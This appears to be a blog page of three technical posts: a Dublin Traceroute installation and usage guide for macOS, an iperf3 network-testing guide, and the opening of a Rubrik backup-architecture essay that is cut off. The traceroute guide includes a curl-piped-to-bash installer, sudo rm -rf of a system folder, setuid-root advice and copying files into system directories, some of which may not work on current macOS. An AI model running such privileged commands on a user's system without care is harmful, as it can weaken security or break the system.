Dublin Traceroute on macOS: A Complete Installation and Usage Guide

Modern networks are far more complex than the simple point to point paths of the early internet. Equal Cost Multi Path (ECMP) routing, carrier grade NAT, and load balancing mean that packets from your machine to a destination might traverse entirely different network paths depending on flow hashing algorithms. Traditional traceroute tools simply cannot handle this complexity, often producing misleading or incomplete results. Dublin Traceroute solves this problem.

This guide provides a detailed walkthrough of installing Dublin Traceroute on macOS, addressing the common Xcode compatibility issues that plague the build process, and exploring the tool’s advanced capabilities for network path analysis.

1. Understanding Dublin Traceroute

1.1 What is Dublin Traceroute?

Dublin Traceroute is a NAT aware multipath tracerouting tool developed by Andrea Barberio. Unlike traditional traceroute utilities, it uses techniques pioneered by Paris traceroute to enumerate all possible network paths in ECMP environments, while adding novel NAT detection capabilities.

The tool addresses a fundamental limitation of classic traceroute. When multiple equal cost paths exist between source and destination, traditional traceroute cannot distinguish which path each packet belongs to, potentially showing you a composite “ghost path” that no real packet actually traverses.

1.2 How ECMP Breaks Traditional Traceroute

Consider a network topology where packets from host A to host F can take two paths:

A → B → D → F
A → C → E → F

Traditional traceroute sends packets with incrementing TTL values and records the ICMP Time Exceeded responses. However, because ECMP routers hash packets to determine their path (typically based on source IP, destination IP, source port, destination port, and protocol), successive traceroute packets may be routed differently.

The result? Traditional traceroute might show you something like A → B → E → F which is a path that doesn’t actually exist in your network. This phantom path combines hops from two different real paths, making network troubleshooting extremely difficult.

1.3 The Paris Traceroute Innovation

The Paris traceroute team invented a technique that keeps the flow identifier constant across all probe packets. By maintaining consistent values for the fields that routers use for ECMP hashing, all probes follow the same path. Dublin Traceroute implements this technique and extends it.

1.4 Dublin Traceroute’s NAT Detection

Dublin Traceroute introduces a unique NAT detection algorithm. It forges a custom IP ID in outgoing probe packets and tracks these identifiers in ICMP response packets. When a response references an outgoing packet with different source/destination addresses or ports than what was sent, this indicates NAT translation occurred at that hop.

For IPv6, where there is no IP ID field, Dublin Traceroute uses the payload length field to achieve the same tracking capability.

2. Prerequisites and System Requirements

Before installing Dublin Traceroute, ensure your system meets these requirements:

2.1 macOS Version

Dublin Traceroute builds on macOS, though the maintainers note that macOS “breaks at every major release”. Currently supported versions include macOS Monterey, Ventura, Sonoma, and Sequoia. The Apple Silicon (M1/M2/M3/M4) Macs work correctly with Homebrew’s ARM native builds.

2.2 Xcode Command Line Tools

The Xcode Command Line Tools are mandatory. Verify your installation:

# Check if CLT is installed
xcode-select -p

Expected output for CLT only:

/Library/Developer/CommandLineTools

Expected output if full Xcode is installed:

/Applications/Xcode.app/Contents/Developer

Check the installed version:

pkgutil --pkg-info=com.apple.pkg.CLTools_Executables

Output example:

package-id: com.apple.pkg.CLTools_Executables
version: 16.0.0
volume: /
location: /
install-time: 1699012345

2.3 Homebrew

Homebrew is the recommended package manager for installing dependencies. Verify or install:

# Check if Homebrew is installed
which brew

# If not installed, install it
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"

For Apple Silicon Macs, ensure the Homebrew path is in your shell configuration:

echo 'eval "$(/opt/homebrew/bin/brew shellenv)"' >> ~/.zprofile
source ~/.zprofile

3. Installing Xcode Command Line Tools

3.1 Fresh Installation

If you don’t have the Command Line Tools installed:

xcode-select --install

A dialog will appear prompting you to install. Click “Install” and wait for the download to complete (typically 1 to 2 GB).

3.2 Updating Existing Installation

After a macOS upgrade, your Command Line Tools may be outdated. Update via Software Update:

softwareupdate --list

Look for entries like Command Line Tools for Xcode-XX.X and install:

softwareupdate --install "Command Line Tools for Xcode-16.0"

Alternatively, download directly from Apple Developer:

  1. Visit https://developer.apple.com/download/more/
  2. Sign in with your Apple ID
  3. Search for “Command Line Tools”
  4. Download the version matching your macOS

3.3 Resolving Version Conflicts

A common issue occurs when both full Xcode and Command Line Tools are installed with mismatched versions. Check which is active:

xcode-select -p

If it points to Xcode.app but you want to use standalone CLT:

sudo xcode-select --switch /Library/Developer/CommandLineTools

To switch back to Xcode:

sudo xcode-select --switch /Applications/Xcode.app/Contents/Developer

3.4 The Xcode 26.0 Homebrew Bug

If you see an error like:

Warning: Your Xcode (16.1) at /Applications/Xcode.app is too outdated.
Please update to Xcode 26.0 (or delete it).

This is a known Homebrew bug on macOS Tahoe betas where placeholder version mappings reference non existent Xcode versions. The workaround:

# Force Homebrew to use the CLT instead
sudo xcode-select --switch /Library/Developer/CommandLineTools

# Or ignore the warning if builds succeed
export HOMEBREW_NO_INSTALLED_DEPENDENTS_CHECK=1

3.5 Complete Reinstallation

For persistent issues, perform a clean reinstall:

# Remove existing CLT
sudo rm -rf /Library/Developer/CommandLineTools

# Reinstall
xcode-select --install

After installation, verify the compiler works:

clang --version

Expected output:

Apple clang version 16.0.0 (clang-1600.0.26.3)
Target: arm64-apple-darwin24.0.0
Thread model: posix
InstalledDir: /Library/Developer/CommandLineTools/usr/bin

4. Installing Dependencies

Dublin Traceroute requires several libraries that must be installed before building.

4.1 Core Dependencies

brew install cmake
brew install pkg-config
brew install libtins
brew install jsoncpp
brew install libpcap

Verify the installations:

brew list libtins
brew list jsoncpp

4.2 Handling the jsoncpp CMake Discovery Issue

A common build failure occurs when CMake cannot find jsoncpp even though it’s installed:

CMake Error at /usr/local/Cellar/cmake/3.XX.X/share/cmake/Modules/FindPkgConfig.cmake:696 (message):
  None of the required 'jsoncpp' found

This happens because jsoncpp’s pkg-config file may not be in the expected location. Fix this by setting the PKG_CONFIG_PATH:

# For Intel Macs
export PKG_CONFIG_PATH="/usr/local/lib/pkgconfig:$PKG_CONFIG_PATH"

# For Apple Silicon Macs
export PKG_CONFIG_PATH="/opt/homebrew/lib/pkgconfig:$PKG_CONFIG_PATH"

Add this to your shell profile for persistence:

echo 'export PKG_CONFIG_PATH="/opt/homebrew/lib/pkgconfig:$PKG_CONFIG_PATH"' >> ~/.zshrc
source ~/.zshrc

4.3 Dependencies for Python Bindings and Visualization

For the full feature set including graphical output:

brew install graphviz
brew install python@3.11
pip3 install pygraphviz pandas matplotlib tabulate

If pygraphviz fails to install, you need to specify the graphviz paths:

export CFLAGS="-I $(brew --prefix graphviz)/include"
export LDFLAGS="-L $(brew --prefix graphviz)/lib"

pip3 install pygraphviz

Alternatively, use the global option syntax:

pip3 install \
    --config-settings="--global-option=build_ext" \
    --config-settings="--global-option=-I$(brew --prefix graphviz)/include/" \
    --config-settings="--global-option=-L$(brew --prefix graphviz)/lib/" \
    pygraphviz

5. Installing Dublin Traceroute

5.1 Method 1: Homebrew Formula (Recommended)

Dublin Traceroute provides a Homebrew formula, though it’s not in the official repository:

# Download the formula
wget https://raw.githubusercontent.com/insomniacslk/dublin-traceroute/master/homebrew/dublin-traceroute.rb

# Install using the local formula
brew install ./dublin-traceroute.rb

If wget is not available:

curl -O https://raw.githubusercontent.com/insomniacslk/dublin-traceroute/master/homebrew/dublin-traceroute.rb
brew install ./dublin-traceroute.rb

5.2 Method 2: Building from Source

For more control over the build process:

# Clone the repository
git clone https://github.com/insomniacslk/dublin-traceroute.git
cd dublin-traceroute

# Create build directory
mkdir build && cd build

# Configure with CMake
cmake .. \
    -DCMAKE_INSTALL_PREFIX=/usr/local \
    -DCMAKE_BUILD_TYPE=Release

# Build
make -j$(sysctl -n hw.ncpu)

# Install
sudo make install

5.3 Troubleshooting Build Failures

libtins Not Found

CMake Error: Could not find libtins

Fix:

# Ensure libtins is properly linked
brew link --force libtins

# Set CMake prefix path
cmake .. -DCMAKE_PREFIX_PATH="$(brew --prefix)"

Missing Headers

fatal error: 'tins/tins.h' file not found

Fix by specifying include paths:

cmake .. \
    -DCMAKE_INCLUDE_PATH="$(brew --prefix libtins)/include" \
    -DCMAKE_LIBRARY_PATH="$(brew --prefix libtins)/lib"

googletest Submodule Warning

-- googletest git submodule is absent. Run `git submodule init && git submodule update` to get it

This is informational only and doesn’t prevent the build. To silence it:

cd dublin-traceroute
git submodule init
git submodule update

5.4 Setting Up Permissions

Dublin Traceroute requires raw socket access. On macOS, this typically means running as root:

sudo dublin-traceroute 8.8.8.8

For convenience, you can set the setuid bit (security implications should be understood):

# Find the installed binary
DTPATH=$(which dublin-traceroute)

# If it's a symlink, get the real path
DTREAL=$(greadlink -f "$DTPATH")

# Set ownership and setuid
sudo chown root:wheel "$DTREAL"
sudo chmod u+s "$DTREAL"

Note: Homebrew’s security model discourages setuid binaries. The recommended approach is to use sudo explicitly.

6. Installing Python Bindings

The Python bindings provide additional features including visualization and statistical analysis.

6.1 Installation

pip3 install dublintraceroute

If the C++ library isn’t found:

# Ensure the library is in the expected location
sudo cp /usr/local/lib/libdublintraceroute* /usr/lib/

# Or set the library path
export DYLD_LIBRARY_PATH="/usr/local/lib:$DYLD_LIBRARY_PATH"

pip3 install dublintraceroute

6.2 Verification

import dublintraceroute
print(dublintraceroute.__version__)

7. Basic Usage

7.1 Simple Traceroute

sudo dublin-traceroute 8.8.8.8

Output:

Starting dublin-traceroute
Traceroute from 0.0.0.0:12345 to 8.8.8.8:33434~33453 (probing 20 paths, min TTL is 1, max TTL is 30, delay is 10 ms)

== Flow ID 33434 ==
 1   192.168.1.1 (gateway), IP ID: 17503 RTT 2.657 ms ICMP (type=11, code=0) 'TTL expired in transit', NAT ID: 0
 2   10.0.0.1, IP ID: 0 RTT 15.234 ms ICMP (type=11, code=0) 'TTL expired in transit', NAT ID: 0
 3   72.14.215.85, IP ID: 0 RTT 18.891 ms ICMP (type=11, code=0) 'TTL expired in transit', NAT ID: 0
...

7.2 Command Line Options

dublin-traceroute --help
Dublin Traceroute v0.4.2
Written by Andrea Barberio - https://insomniac.slackware.it

Usage:
  dublin-traceroute <target> [options]

Options:
  -h --help                 Show this help
  -v --version              Print version
  -s SRC_PORT --sport=PORT  Source port to send packets from
  -d DST_PORT --dport=PORT  Base destination port
  -n NPATHS --npaths=NUM    Number of paths to probe (default: 20)
  -t MIN_TTL --min-ttl=TTL  Minimum TTL to probe (default: 1)
  -T MAX_TTL --max-ttl=TTL  Maximum TTL to probe (default: 30)
  -D DELAY --delay=MS       Inter-packet delay in milliseconds
  -b --broken-nat           Handle broken NAT configurations
  -N --no-dns               Skip reverse DNS lookups
  -o --output-file=FILE     Output file name (default: trace.json)

7.3 Controlling Path Enumeration

Probe fewer paths for faster results:

sudo dublin-traceroute -n 5 8.8.8.8

Limit TTL range for local network analysis:

sudo dublin-traceroute -t 1 -T 10 192.168.1.1

7.4 JSON Output

Dublin Traceroute always produces a trace.json file containing structured results:

sudo dublin-traceroute -o google_trace.json 8.8.8.8
cat google_trace.json | python3 -m json.tool | head -50

Example JSON structure:

{
  "flows": {
    "33434": {
      "hops": [
        {
          "sent": {
            "timestamp": "2024-01-15T10:30:00.123456",
            "ip": {
              "src": "192.168.1.100",
              "dst": "8.8.8.8",
              "id": 12345
            },
            "udp": {
              "sport": 12345,
              "dport": 33434
            }
          },
          "received": {
            "timestamp": "2024-01-15T10:30:00.125789",
            "ip": {
              "src": "192.168.1.1",
              "id": 54321
            },
            "icmp": {
              "type": 11,
              "code": 0,
              "description": "TTL expired in transit"
            }
          },
          "rtt_usec": 2333,
          "nat_id": 0
        }
      ]
    }
  }
}

8. Advanced Usage and Analysis

8.1 Generating Visual Network Diagrams

Convert the JSON output to a graphical representation:

# Run the traceroute
sudo dublin-traceroute 8.8.8.8

# Generate the graph
python3 scripts/to_graphviz.py trace.json

# View the image
open trace.json.png

The resulting image shows:

  • Each unique hop as an ellipse
  • Arrows indicating packet flow direction
  • RTT times on edges
  • Different colors for different flow paths
  • NAT indicators where detected

8.2 Using Python for Analysis

import dublintraceroute

# Create traceroute object
dt = dublintraceroute.DublinTraceroute(
    dst='8.8.8.8',
    sport=12345,
    dport_base=33434,
    npaths=20,
    min_ttl=1,
    max_ttl=30
)

# Run the traceroute (requires root)
results = dt.traceroute()

# Pretty print the results
results.pretty_print()

Output:

ttl   33436                              33434                              33435
----- ---------------------------------- ---------------------------------- ----------------------------------
1     gateway (2657 usec)                gateway (3081 usec)                gateway (4034 usec)
2     *                                  *                                  *
3     isp-router (33980 usec)            isp-router (35524 usec)            isp-router (41467 usec)
4     core-rtr (44800 usec)              core-rtr (14194 usec)              core-rtr (41489 usec)
5     peer-rtr (43516 usec)              peer-rtr2 (35520 usec)             peer-rtr2 (41924 usec)

8.3 Converting to Pandas DataFrame

import dublintraceroute
import pandas as pd

dt = dublintraceroute.DublinTraceroute('8.8.8.8')
results = dt.traceroute()

# Convert to DataFrame
df = results.to_dataframe()

# Analyze RTT statistics by hop
print(df.groupby('ttl')['rtt_usec'].describe())

# Find the slowest hops
slowest = df.nlargest(5, 'rtt_usec')[['ttl', 'name', 'rtt_usec']]
print(slowest)

8.4 Visualizing RTT Patterns

import dublintraceroute
import matplotlib.pyplot as plt

dt = dublintraceroute.DublinTraceroute('8.8.8.8')
results = dt.traceroute()
df = results.to_dataframe()

# Group by destination port (flow)
group = df.groupby('sent_udp_dport')['rtt_usec']

fig, ax = plt.subplots(figsize=(12, 6))

for label, sdf in group:
    sdf.reset_index(drop=True).plot(ax=ax, label=f'Flow {label}')

ax.set_xlabel('Hop Number')
ax.set_ylabel('RTT (microseconds)')
ax.set_title('RTT by Network Path')
ax.legend(title='Destination Port', loc='upper left')

plt.tight_layout()
plt.savefig('rtt_analysis.png', dpi=150)
plt.show()

8.5 Detecting NAT Traversal

import dublintraceroute
import json

dt = dublintraceroute.DublinTraceroute('8.8.8.8')
results = dt.traceroute()

# Access raw JSON
trace_data = json.loads(results.to_json())

# Find NAT hops
for flow_id, flow_data in trace_data['flows'].items():
    print(f"\nFlow {flow_id}:")
    for hop in flow_data['hops']:
        if hop.get('nat_id', 0) != 0:
            print(f"  TTL {hop['ttl']}: NAT detected (ID: {hop['nat_id']})")
            if 'received' in hop:
                print(f"    Response from: {hop['received']['ip']['src']}")

8.6 Handling Broken NAT Configurations

Some NAT devices don’t properly translate ICMP payloads. Use the broken NAT flag:

sudo dublin-traceroute --broken-nat 8.8.8.8

This mode sends packets with characteristics that allow correlation even when NAT devices mangle the ICMP error payloads.

8.7 Simple Probe Mode

Send single probes without full traceroute enumeration:

sudo python3 -m dublintraceroute probe google.com

Output:

Sending probes to google.com
Source port: 12345, destination port: 33434, num paths: 20, TTL: 64, delay: 10, broken NAT: False

#   target          src port   dst port   rtt (usec)
--- --------------- ---------- ---------- ------------
1   142.250.185.46  12345      33434      15705
2   142.250.185.46  12345      33435      15902
3   142.250.185.46  12345      33436      16127
...

This is useful for quick connectivity tests to verify reachability through multiple paths.

9. Interpreting Results

9.1 Understanding Flow IDs

Each “flow” in Dublin Traceroute output represents a distinct path through the network. The flow ID is derived from the destination port number. With --npaths=20, you’ll see flows numbered 33434 through 33453.

9.2 NAT ID Field

The NAT ID indicates detected NAT translations:

  • NAT ID: 0 means no NAT detected at this hop
  • NAT ID: N (where N > 0) indicates the Nth NAT device encountered

9.3 ICMP Codes

Common ICMP responses:

TypeCodeMeaning
110TTL expired in transit
30Network unreachable
31Host unreachable
33Port unreachable (destination reached)
313Administratively filtered

9.4 Identifying ECMP Paths

When multiple flows show different hops at the same TTL, you’ve discovered ECMP routing:

== Flow 33434 ==
 3   router-a.isp.net, RTT 25 ms

== Flow 33435 ==
 3   router-b.isp.net, RTT 28 ms

This reveals two distinct paths through the ISP network.

9.5 Recognizing Asymmetric Routing

Different RTT values for the same hop across flows might indicate:

  • Load balancing with different queue depths
  • Asymmetric return paths
  • Different physical path lengths

10. Go Implementation

Dublin Traceroute also has a Go implementation with IPv6 support:

# Install Go if needed
brew install go

# Build the Go version
cd dublin-traceroute/go/dublintraceroute
go build -o dublin-traceroute-go ./cmd/dublin-traceroute

# Run with IPv6 support
sudo ./dublin-traceroute-go -6 2001:4860:4860::8888

The Go implementation provides:

  • IPv4/UDP probes
  • IPv6/UDP probes (not available in C++ version)
  • JSON output compatible with Python visualization tools
  • DOT output for Graphviz

11. Integration Examples

11.1 Automated Network Monitoring Script

#!/bin/bash
# monitor_paths.sh - Periodic path monitoring

TARGETS=("8.8.8.8" "1.1.1.1" "208.67.222.222")
OUTPUT_DIR="/var/log/dublin-traceroute"
INTERVAL=3600  # 1 hour

mkdir -p "$OUTPUT_DIR"

while true; do
    TIMESTAMP=$(date +%Y%m%d_%H%M%S)

    for target in "${TARGETS[@]}"; do
        OUTPUT_FILE="${OUTPUT_DIR}/${target//\./_}_${TIMESTAMP}.json"

        echo "Tracing $target at $(date)"
        sudo dublin-traceroute -n 10 -o "$OUTPUT_FILE" "$target" > /dev/null 2>&1

        # Generate visualization
        python3 /usr/local/share/dublin-traceroute/to_graphviz.py "$OUTPUT_FILE"
    done

    sleep $INTERVAL
done

11.2 Path Comparison Analysis

#!/usr/bin/env python3
"""Compare network paths between two traceroute runs."""

import json
import sys
from collections import defaultdict

def load_trace(filename):
    with open(filename) as f:
        return json.load(f)

def extract_paths(trace):
    paths = {}
    for flow_id, flow_data in trace['flows'].items():
        path = []
        for hop in sorted(flow_data['hops'], key=lambda x: x['sent']['ip']['ttl']):
            if 'received' in hop:
                path.append(hop['received']['ip']['src'])
            else:
                path.append('*')
        paths[flow_id] = path
    return paths

def compare_traces(trace1_file, trace2_file):
    trace1 = load_trace(trace1_file)
    trace2 = load_trace(trace2_file)

    paths1 = extract_paths(trace1)
    paths2 = extract_paths(trace2)

    print("Path Comparison Report")
    print("=" * 60)

    all_flows = set(paths1.keys()) | set(paths2.keys())

    for flow in sorted(all_flows, key=int):
        p1 = paths1.get(flow, [])
        p2 = paths2.get(flow, [])

        if p1 == p2:
            print(f"Flow {flow}: IDENTICAL")
        else:
            print(f"Flow {flow}: DIFFERENT")
            max_len = max(len(p1), len(p2))
            for i in range(max_len):
                h1 = p1[i] if i < len(p1) else '-'
                h2 = p2[i] if i < len(p2) else '-'
                marker = '  ' if h1 == h2 else '>>'
                print(f"  {marker} TTL {i+1}: {h1:20} vs {h2}")

if __name__ == '__main__':
    if len(sys.argv) != 3:
        print(f"Usage: {sys.argv[0]} trace1.json trace2.json")
        sys.exit(1)

    compare_traces(sys.argv[1], sys.argv[2])

11.3 Alerting on Path Changes

#!/usr/bin/env python3
"""Alert when network paths change from baseline."""

import json
import hashlib
import smtplib
from email.mime.text import MIMEText
import subprocess
import sys

BASELINE_FILE = '/etc/dublin-traceroute/baseline.json'
ALERT_EMAIL = 'netops@example.com'

def get_path_hash(trace):
    """Generate a hash of all paths for quick comparison."""
    paths = []
    for flow_id in sorted(trace['flows'].keys(), key=int):
        flow = trace['flows'][flow_id]
        path = []
        for hop in sorted(flow['hops'], key=lambda x: x['sent']['ip']['ttl']):
            if 'received' in hop:
                path.append(hop['received']['ip']['src'])
        paths.append(':'.join(path))

    combined = '|'.join(paths)
    return hashlib.sha256(combined.encode()).hexdigest()

def send_alert(target, old_hash, new_hash, trace_file):
    msg = MIMEText(f"""
Network path change detected!

Target: {target}
Previous hash: {old_hash}
Current hash: {new_hash}
Trace file: {trace_file}

Please investigate the path change.
""")
    msg['Subject'] = f'[ALERT] Network path change to {target}'
    msg['From'] = 'dublin-traceroute@example.com'
    msg['To'] = ALERT_EMAIL

    with smtplib.SMTP('localhost') as s:
        s.send_message(msg)

def main(target):
    # Run traceroute
    trace_file = f'/tmp/trace_{target.replace(".", "_")}.json'
    subprocess.run([
        'sudo', 'dublin-traceroute',
        '-n', '10',
        '-o', trace_file,
        target
    ], capture_output=True)

    # Load results
    with open(trace_file) as f:
        trace = json.load(f)

    current_hash = get_path_hash(trace)

    # Load baseline
    try:
        with open(BASELINE_FILE) as f:
            baseline = json.load(f)
    except FileNotFoundError:
        baseline = {}

    # Compare
    if target in baseline:
        if baseline[target] != current_hash:
            send_alert(target, baseline[target], current_hash, trace_file)
            print(f"ALERT: Path to {target} has changed!")

    # Update baseline
    baseline[target] = current_hash
    with open(BASELINE_FILE, 'w') as f:
        json.dump(baseline, f, indent=2)

if __name__ == '__main__':
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} target")
        sys.exit(1)
    main(sys.argv[1])

12. Troubleshooting Common Issues

12.1 Permission Denied

Error: Could not open raw socket: Permission denied

Solution: Run with sudo or configure setuid as described in section 5.4.

12.2 No Response from Hops

If you see many asterisks (*) in output:

  1. Firewall may be blocking ICMP responses
  2. Rate limiting on intermediate routers
  3. Increase the delay between probes:
sudo dublin-traceroute --delay=50 8.8.8.8

12.3 Library Not Found at Runtime

dyld: Library not loaded: @rpath/libdublintraceroute.dylib

Fix:

# Add library path
export DYLD_LIBRARY_PATH="/usr/local/lib:$DYLD_LIBRARY_PATH"

# Or create a symlink
sudo ln -s /usr/local/lib/libdublintraceroute.dylib /usr/lib/

12.4 Python Import Error

ImportError: No module named 'dublintraceroute._dublintraceroute'

The C++ library wasn’t found during Python module installation. Rebuild:

# Ensure headers are available
sudo cp -r /usr/local/include/dublintraceroute /usr/include/

# Reinstall Python module
pip3 uninstall dublintraceroute
pip3 install --no-cache-dir dublintraceroute

12.5 Graphviz Generation Fails

pygraphviz.AGraphError: Error processing dot file

Ensure Graphviz binaries are in PATH:

brew link --force graphviz
export PATH="/opt/homebrew/bin:$PATH"

13. Security Considerations

13.1 Raw Socket Requirements

Dublin Traceroute requires raw socket access to forge custom packets. This capability should be restricted:

  • Prefer sudo over setuid binaries
  • Consider using a dedicated user account for network monitoring
  • Audit usage through system logs

13.2 Information Disclosure

Traceroute output reveals internal network topology. Treat results as sensitive:

  • Don’t expose trace data publicly without sanitization
  • Consider internal IP address implications
  • NAT detection can reveal infrastructure details

13.3 Rate Limiting

Aggressive tracerouting can trigger IDS/IPS alerts or rate limiting. Use appropriate delays in production:

sudo dublin-traceroute --delay=100 --npaths=5 target

14. Conclusion

Dublin Traceroute provides essential visibility into modern network paths that traditional traceroute tools simply cannot offer. The combination of ECMP path enumeration and NAT detection makes it invaluable for troubleshooting complex network issues, validating routing policies, and understanding how your traffic actually traverses the internet.

The installation process on macOS, while occasionally complicated by Xcode version mismatches, is straightforward once dependencies are properly configured. The Python bindings extend the tool’s utility with visualization and analytical capabilities that transform raw traceroute data into actionable network intelligence.

For network engineers dealing with multi homed environments, CDN architectures, or simply trying to understand why packets take the paths they do, Dublin Traceroute deserves a place in your diagnostic toolkit.

15. References

  • Dublin Traceroute Official Site: https://dublin-traceroute.net
  • GitHub Repository: https://github.com/insomniacslk/dublin-traceroute
  • Python Bindings: https://github.com/insomniacslk/python-dublin-traceroute
  • Paris Traceroute Background: https://paris-traceroute.net/about
  • Homebrew: https://brew.sh
  • Apple Developer Downloads: https://developer.apple.com/download/more/
0
0

iperf3: The Engineer’s Swiss Army Knife for Network Performance Testing

When something is “slow” on a network, opinions arrive before evidence. Storage teams blame the network, network teams blame the application, and application teams blame “the cloud”.☁️

iperf3 cuts through that noise by giving you hard, repeatable, protocol-level facts about throughput, latency behavior, and packet loss.

This post explains what iperf3 actually measures, how it works, how to install it, and the top 10 use cases every engineer should know, with concrete command examples.

1. What is iperf3 (and what it is not)

iperf3 is a client–server network testing tool that measures:

  • TCP and UDP throughput
  • Packet loss (UDP)
  • Jitter (UDP)
  • Connection behavior under parallel streams
  • Performance over time (interval reporting)

It does not:

  • Measure application performance
  • Replace packet captures
  • Diagnose routing correctness
  • Simulate real application payloads

Think of iperf3 as a controlled load generator, not an application simulator.

2. How iperf3 works (under the hood)

  • One host runs in server mode
  • Another runs as a client
  • The client generates traffic for a defined duration
  • The server measures what it actually receives
  • Results are reported at fixed intervals and as a summary

Start a server

iperf3 -s

Run a client

iperf3 -c <server-ip>

By default:

  • TCP
  • One stream
  • 10 seconds
  • Adaptive window sizing

Everything else is explicit configuration.

3. Installing iperf3

iperf3 is widely available and lightweight. Installation is usually trivial, but version consistency matters when comparing results.

3.1 Linux (Most Distributions)

Debian / Ubuntu

sudo apt update

sudo apt install -y iperf3

During installation you may be asked whether to start iperf3 as a daemon — this is optional and usually unnecessary.

RHEL / Rocky / Alma / CentOS Stream

sudo dnf install -y iperf3

Amazon Linux 2023

sudo dnf install -y iperf3

3.2 macOS (Homebrew)

brew install iperf3

Verify:

iperf3 –version

3.3 Windows

Option 1: Windows Subsystem for Linux (Recommended)

Install iperf3 inside WSL:

sudo apt install -y iperf3

This gives you Linux-consistent behavior and better scripting.

Option 2: Native Windows Binary

  1. Download the official build from the iperf project
  2. Extract iperf3.exe
  3. Run from PowerShell or CMD

iperf3.exe -c <server-ip>

Note: Native Windows builds sometimes show lower throughput due to driver and socket differences.

3.4 Containers (Docker)

Useful for ephemeral testing or CI pipelines.

docker run –rm -it networkstatic/iperf3 -s

Client:

docker run –rm -it networkstatic/iperf3 -c <server-ip>

3.5 Verifying Installation

iperf3 –version

You should see something like:

iperf 3.x (cJSON 1.x)

4. Why iperf3 is still relevant in 2026

Despite SD-WANs, overlays, service meshes, and cloud abstractions:

  • TCP still collapses under packet loss
  • Firewalls still mis-handle long-lived flows
  • VPNs still pin CPUs
  • East–west traffic still surprises people

iperf3 answers the single most important question first:

Can the network actually move data at the speed we think it can?

Top 10 iperf3 Use Cases (with Commands)

Use Case 1: Baseline TCP Throughput Between Two Hosts

iperf3 -c 10.0.0.10

Tells you

  • Real TCP throughput
  • Window scaling effectiveness
  • Obvious bottlenecks

Use Case 2: Parallel TCP Streams

iperf3 -c 10.0.0.10 -P 8

Tells you

  • Whether the link scales with concurrency
  • Presence of per-flow shaping

Use Case 3: Sustained Throughput Over Time

iperf3 -c 10.0.0.10 -t 120 -i 1

Tells you

  • Burst behavior
  • Throttling over time

Use Case 4: UDP Packet Loss and Jitter

iperf3 -c 10.0.0.10 -u -b 500M

Tells you

  • Packet loss
  • Jitter
  • True capacity without TCP recovery

Use Case 5: Maximum Loss-Free UDP Rate

iperf3 -c 10.0.0.10 -u -b 100M

iperf3 -c 10.0.0.10 -u -b 300M

iperf3 -c 10.0.0.10 -u -b 600M

Use Case 6: Reverse Direction Testing

iperf3 -c 10.0.0.10 -R

Use Case 7: VPN and Tunnel Testing

iperf3 -c 10.8.0.1 -P 4

Use Case 8: Firewall and Load Balancer Timeouts

iperf3 -c 10.0.0.10 -t 300

Use Case 9: NIC Offloads and Jumbo Frames

iperf3 -c 10.0.0.10 -P 4 -l 64K

Use Case 10: CI / Regression Testing (JSON Output)

iperf3 -c 10.0.0.10 -J > result.json

14. Common iperf3 Mistakes

  1. Testing from CPU-starved hosts
  2. Running tests too short
  3. Ignoring reverse tests
  4. Assuming TCP hides loss safely
  5. Forgetting MTU and MSS effects

15. Final Thoughts

iperf3 is deliberately simple.

That simplicity makes it dangerous to ignore.

If you don’t know what your network can do under controlled load, every performance discussion becomes opinion-driven theatre.

If you want next:

  • A one-page iperf3 cheat sheet
  • A decision tree for diagnosing poor results
  • Cloud-specific examples (AWS ENA, Azure Accelerated Networking)
  • An infographic showing TCP backoff vs UDP loss

Say the word.

0
0

Why Rubrik’s Architecture Matters: When Restore, Not Backup, Is the Product

1. Backups Should Be Boring (and That Is the Point)

Backups are boring. They should be boring. A backup system that generates excitement is usually signalling failure.

The only time backups become interesting is when they are missing, and that interest level is lethal. Emergency bridges. Frozen change windows. Executive escalation. Media briefings. Regulatory apology letters. Engineers being asked questions that have no safe answers.

Most backup platforms are built for the boring days. Rubrik is designed for the day boredom ends.

2. Backup Is Not the Product. Restore Is.

Many organisations still evaluate backup platforms on the wrong metric: how fast they can copy data somewhere else.

That metric is irrelevant during an incident.

When things go wrong, the only questions that matter are:

  • What can I restore?
  • How fast can it be used?
  • How many restores can run in parallel?
  • How little additional infrastructure is required?

Rubrik treats restore as the primary product, not a secondary feature.

3. Architectural Starting Point: Designed for Failure, Not Demos

Rubrik was built without tape era assumptions. There is no central backup server, no serial job controller, and no media server bottleneck. Instead, it uses a distributed, scale out architecture with a global metadata index and a stateless policy engine.

Restore becomes a metadata lookup problem, not a job replay problem. This distinction is invisible in demos and decisive during outages.

4. Performance Metrics That Actually Matter

Backup throughput is easy to optimise and easy to market. Restore performance is constrained by network fan out, restore concurrency, control plane orchestration, and application host contention.

Rubrik addresses this by default through parallel restore streams, linear scaling with node count, and minimal control plane chatter. Restore performance becomes predictable rather than optimistic.

5. Restore Semantics That Match Reality

The real test of any backup platform is not how elegantly it captures data, but how usefully it returns that data when needed. This is where architectural decisions made years earlier either pay dividends or extract penalties.

5.1 Instant Access Instead of Full Rehydration

Rubrik does not require full data copy back before access. It supports live mount of virtual machines, database mounts directly from backup storage, and file system mounts for selective recovery.

The recovery model becomes access first, copy later if needed. This is the difference between minutes and hours when production is down.

5.2 Dropping a Table Should Not Be a Crisis

Rubrik understands databases as structured systems, not opaque blobs.

It supports table level restores for SQL Server, mounting a database backup as a live database, extracting tables or schemas without restoring the full database, and point in time recovery without rollback.

Accidental table drops should be operational annoyances, not existential threats.

5.3 Supported Database Engines

Rubrik provides native protection for the major enterprise database platforms:

Database EngineLive MountPoint in Time RecoveryKey Constraints
Microsoft SQL ServerYesYes (transaction log replay)SQL 2012+ supported; Always On AG, FCI, standalone
Oracle DatabaseYesYes (archive log replay)RAC, Data Guard, Exadata supported; SPFILE required for automated recovery
SAP HANANoYesBackint API integration; uses native HANA backup scheduling
PostgreSQLNoYes (up to 5 minute RPO)File level incremental; on premises and cloud (AWS, Azure, GCP)
IBM Db2Via Elastic App ServiceYesUses native Db2 backup utilities
MongoDBVia Elastic App ServiceYesSharded and unsharded clusters; no quiescing required
MySQLVia Elastic App ServiceYesUses native MySQL backup tools
CassandraVia Elastic App ServiceYesVia Rubrik Datos IO integration

The distinction between native integration and Elastic App Service matters operationally. Native integration means Rubrik handles discovery, scheduling, and orchestration directly. Elastic App Service means Rubrik provides managed volumes as backup targets while the database’s native tools handle the actual backup process. Both approaches deliver immutability and policy driven retention, but the operational experience differs.

5.4 Live Mount: Constraints and Caveats

